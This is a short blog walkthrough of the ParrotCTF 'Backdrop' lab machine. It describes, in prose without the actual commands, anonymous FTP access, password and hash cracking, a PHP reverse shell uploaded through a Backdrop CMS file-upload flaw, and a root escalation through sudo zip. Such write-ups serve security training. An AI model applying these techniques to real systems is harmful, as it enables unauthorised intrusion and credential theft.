ParrotCTF Backdrop: Detailed Walkthrough

ParthParth
2 min read

Table of contents

This room focuses on leveraging several misconfigurations and gaining initial access using the CMS dashboard. While it requires some research, it is a relatively straightforward machine.
Access the machine here Let's dive in!

Enumeration:

Let's run a basic Nmap scan.

We find three open ports: 21 (FTP), 22 (SSH), and 80 (HTTP). Let's enumerate further.

  1. FTP/21

    We can log in anonymously. Listing the directory reveals a zip file. Let's download it to our local machine.

    Now, let's unzip the file.

    Whoops.. it asks for a password...
    No worries.. we've got JohnTheRipper to our rescue...

    Boom! We got the password. Let's unzip it. We find a list of backup credentials.

    We have three pairs of credentials. Let's use crackstation.net to crack the hashes.

  2. HTTP/80

    First, let's open the webpage.

    I checked the page source and robots.txt but didn't find anything significant. Let's use feroxbuster to list all the directories.

    There isn't much of interest.

    We find a login page. Let's use the credentials we found earlier. And boom! We're in.

    Now, the main question is how do we get a reverse shell? After some research, I found an exploit for unrestricted file upload in Backdrop CMS. Follow the steps in this post to get the reverse shell content in a PHP file. Refer to revshells.com.

    To execute, open the PHP file in the browser.
    URL: machine-ip/layouts/harris_flexible/filename.php

    Nice! We got the reverse shell. Now, let's stabilize the shell.

    Privilege Escalation:

    We've got a shell as www-data. We need to escalate from www-data to Alison, and then to root. By enumerating the machine further, I found that we have read access to Alison's files. Let's get the user flag.

    noice...
    www-data to Alison:

    We can run linpeas on the machine, but for CMS-based machines, I usually check the /var/www directory. Often, there are some credentials lying around. In this case, I found a hidden file in /var/www/html/files.

    The file contains Alison's creds.

    Now that we are Alison, let's manually enumerate the box. Running sudo -l, we see that we can use the zip command with root privileges. We can exploit this using gtfobins.

    Entering these commands in the shell gives you root access. ggs.

    I hope you find this write-up helpful.
    In case of any queries, feel free to contact me on X @hey_parthhh.

    Happy Hacking!

1
Subscribe to my newsletter

Read articles from Parth directly inside your inbox. Subscribe to the newsletter, and don't miss out.

#cybersecurityCTF WriteupethicalhackingKali Linuxjohn-the-ripper

Written by

Parth
Parth